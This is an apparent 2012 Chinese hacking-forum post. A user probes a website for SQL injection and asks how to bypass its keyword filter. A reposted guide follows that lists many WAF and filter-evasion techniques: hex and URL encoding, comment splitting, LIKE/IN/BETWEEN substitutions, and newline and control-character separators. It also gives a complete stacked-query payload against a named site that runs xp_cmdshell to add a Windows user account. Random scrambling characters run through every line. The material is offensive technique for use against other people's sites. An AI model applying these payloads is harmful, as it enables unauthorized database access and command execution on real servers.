路过这个网站,检测了一下.
4 R4 m* F5 V, r/ n% p: }http://www.xxx.cn/Article.asp?ID=117 and 1=1
- N2 Z. N0 d3 n7 M: B9 ^直接返回主页
9 Z; }+ O2 q! l0 q# Vhttp://www.xxx.cn/Article.asp?ID=117 or 1=1
& y( N) U( r2 R* T* [ n9 K: [直接返回主页6 U* c1 ~, k% F! {. }
http://www.xxx.cn/Article.asp?ID=117 or# ]2 |& m7 Y4 p2 S. l5 N N
没有返回主页 没有过滤or1 v( k7 U0 u+ ?$ X
http://www.xxx.cn/Article.asp?ID=117 and
P. B" H0 u6 n( ~( G直接返回主页 看来过滤了and
& S& g$ p5 O% E7 H1 _/ f; lhttp://www.xxx.cn/Article.asp?ID=117 or 1
$ q+ F* A- z) V" B3 K, t没有返回主页 即没有过滤or 也没有过滤1; C3 ~( }9 M, O( z \% I
http://www.xxx.cn/Article.asp?ID=117 or 1=1
0 E. k" e0 C, }% [直接返回主页 很明显过滤了等号
6 n6 Z* t6 Q! M2 r. \& y f3 B: Por的特性是与and相反的., e" n. L+ Z" C7 N! B
or 1=1 爆错 或与原页面不同 ^# M2 y% s. l$ c3 v) x2 z
or 1=2 原页面相同8 o8 O) b# |/ Y9 @' h+ i7 C
这样就是一个注入点. v. w' p R1 ~0 @3 g. B5 D
但他过滤了=号 我就用><号代替=号吧!9 s6 v8 O8 e9 n7 o4 @9 @8 c' T
or 1<2 很明显是正确的,所以应该与原页面不同
3 B: }, U- ?, b4 F1 [/ b! Xor 1>2 很明显是错误的,所以应该与原页面相同 o" O0 i" m/ v
然后看看有没有过滤其他的查询语句,比如select.: w3 B: j5 b$ l4 y- Y' ^" Z
http://www.xxx.cn/Article.asp?ID=117 select8 L4 T+ O: w, z" i% ?
直接返回主页
6 s, B5 G# H/ q( [: I4 t6 s1 n又迷茫了..- @: ^$ b1 \9 p) a: k8 t. ^% e
' Q& ~* _0 w. |9 F8 k4 Y- F; k7 D/ _
, F. B# R- R: L) g' ]
cookies注入.和以下的方法全都试过了,都失败了.还有什么方法可以饶过吗 C* P) _; S8 `& |
这个系统我以为是my动力,后台却是这样的http://www.xxx.cn/admin.asp(应该不是假够台吧)
2 V3 a5 U" ^& @================================================; ?9 B g" L# V) \
以下是转贴:. g s* ~! ]! j8 q
% i$ \# E2 k3 s7 |# b: B
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好……
0 M( R+ H5 ^# i3 [, X. y9 H# e# y经过我的收集,大部分的防注入程序都过滤了以下关键字:
) \2 M6 L3 \" ^2 gand | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =
- a* M) n, \7 N+ R4 W: f而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。 & G/ E. }* R& p) E) g
对于关键字的过滤,以下是我收集的以及我个人的一些想法。 7 O( ~+ w( @7 B: [# R1 C2 _& h
1、运用编码技术绕过 Y+ f" k9 J% t# U! {9 Q) d9 M
如URLEncode编码,ASCII编码绕过。例如or 1=1即
- q1 }$ t. `$ {+ \3 T# z%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。
" _6 i N5 V: J5 B4 H
3 c- B6 E: x3 O2、通过空格绕过
7 b; n/ Z; v G8 m3 f# d8 Q# e如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如
% t/ k( C' q4 O; E- t6 V/ g. Aor’ swords’ =‘swords’
1 Z& ?8 x8 F8 D: ],由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。 - x2 g, I$ U+ R. o$ c: f/ `
3、运用字符串判断代替 ) M5 R4 M$ z @+ O2 ^, ]
用经典的or 1=1判断绕过,如 5 A' B- m6 h9 n; Y3 x+ d8 n# W
or ’swords’ =’swords’
& L3 J1 F% G5 h- R# l- E& ^( B; n6 I,这个方法就是网上在讨论的。
$ g; E! ^8 | p( a4、通过类型转换修饰符N绕过
7 Q T* E+ [+ Y! |可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。 * l, Z& B6 s0 \4 S; _# B! q
5、通过+号拆解字符串绕过
. y/ p# U" D: [1 n' M& w7 }4 {效果值得考证,但毕竟是一种方法。如 ) m! Y* q v- U5 O( F3 E x" u
or ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ ) ( k Z+ Q" ]2 o7 C( h
) m. s9 C9 t5 J% m
6、通过LIKE绕过
; F6 y7 V- _; r0 {: n4 k以前怎么就没想到呢?如or
( B* n c* K* J. @7 g% ^’swords’ LIKE ’sw’
: _! F/ W x# O5 | V!!!显然可以很轻松的绕过
1 P+ d/ E$ j7 H' U/ U3 f6 s% K& N“=”“>” & c& U. X" A! L6 f
的限制……
$ H( ~( A# c- p7、通过IN绕过
& u5 h5 |. _3 S2 g6 B0 l( [( x与上面的LIKE的思路差不多,如 4 W( c2 m, i& E9 a1 p' r
or ’swords’ IN (’swords’)
5 s8 F. `6 @5 M x$ A( R n
8 s0 `) C$ V; a2 W8、通过BETWEEN绕过 ! ]5 q& D+ ]. i6 o4 m
如 1 Q3 m: _1 v3 f0 ]
or ’swords’ BETWEEN ’rw’ AND ’tw’ # ~; h9 U2 F. P7 K5 Y2 H& |
9 [6 Z+ d E% w5 y J: H9、通过>或者<绕过
8 v2 Q' x9 P/ s. ?( A% hor ’swords’ > ’sw’
' R9 h1 d: V' o2 [or ’swords’ < ’tw’
" z4 l y) C$ c/ X: n3 [or 1<3
/ f" W6 h% D' x5 {3 k; x/ d6 |…… / J" f+ u& r( z
10、运用注释语句绕过
5 n, r* a1 \- d9 C用/**/代替空格,如:
D/ h3 S7 z! a+ dUNION /**/ Select /**/user,pwd,from tbluser 4 j N2 R3 J0 i/ z
2 r& W6 J! e: g' n# f用/**/分割敏感词,如: 8 D6 X7 f4 w' b# m
U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser ) ]- y6 s2 J% j, u! E
* z y) Y! {; P6 J1 P/ V8 D
11、用HEX绕过,一般的IDS都无法检测出来
; l3 f0 n' x! }: J$ O0x730079007300610064006D0069006E00 =hex(sysadmin)
, w0 M! w; d5 f+ | m5 X0x640062005F006F0077006E0065007200 =hex(db_owner)
C0 B- r7 B! x3 s另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下: , L! M; T6 ~( G/ m3 h( }0 g4 G
declare @a sysname 6 `% z( |3 Q9 {' v6 _9 h! n
select @a=
: q/ ^+ d; N, [$ C. ~ exec master.dbo.xp_cmdshell @a
, W% h; k- {. P% c+ G0 A效果
, h2 R( G) i2 t. C8 }http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% [email=20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a]20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a[/email];-- 8 C+ i! K. N0 L0 e5 o. X% |
; [, {6 n' T0 L' v, Q, p4 K8 e其中的 6 a1 G k" Q. Q2 N) d# e% F
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
2 t3 P9 E4 Z+ w就是
$ T2 A! S$ D# n5 ~* S“net user angel pass /add”
. X9 e/ _. t9 @! ?& O
6 L& I+ a/ d4 }# {5 G4 Q# l一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。: n- e1 T! R- }; G6 [
引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。7 K$ {9 q" f; W, o: f
另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似
- z3 A! c* [. H4 HCopy code7 a' }! L# n. R6 ?8 ~7 v; a6 p
select * from table exec xp_cmdshell'xxxxxxxxxx'& s# s* a- X/ Q- D4 b
7 V! U+ E# b M6 }
1 l2 ~5 C+ q' n1 k) ?9 Mselect * from table/**/exec xp_cmdshell'xxxxxxxxxx'
T) n% {1 ^7 y5 f: g; N1 n9 `( [9 Q" p6 }* z3 y
4 H3 J" z$ _& i4 S7 u: d: O7 P, Oselect * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'$ ^" d. e2 `' M8 M1 D
4 p( q: A, k/ H
/ u+ y6 _8 a, i$ p; [1 Cselect * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'
+ q5 @: U0 n) {2 H+ u- U. [5 X2 }# j! A
的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧?8 |/ f9 |7 l" ?7 u8 T2 f
( F* A) Y/ o" G这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了
7 Y1 p: R- e7 c1 s可能大家早就知道了,不管怎么说,发在这里吧!
+ Q& y ^! o4 h& ^' i. y8 p
- Z7 _0 j: T3 ]/ R最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。7 U2 q- f1 x- }6 M
- v- U! `4 ?4 w7 [; E2 y; X
) ^1 @: @$ b8 O; d
% w) W1 U" b9 ]/ u. t5 j对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,
# {7 C4 L" q& K; D# Y8 A; Y1 |比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧? ! B% u6 o) y- x- O- q. G& H
, \- B& V/ B( f# u, f
|
发表于 2012-9-15 14:47:46
收藏
支持
反对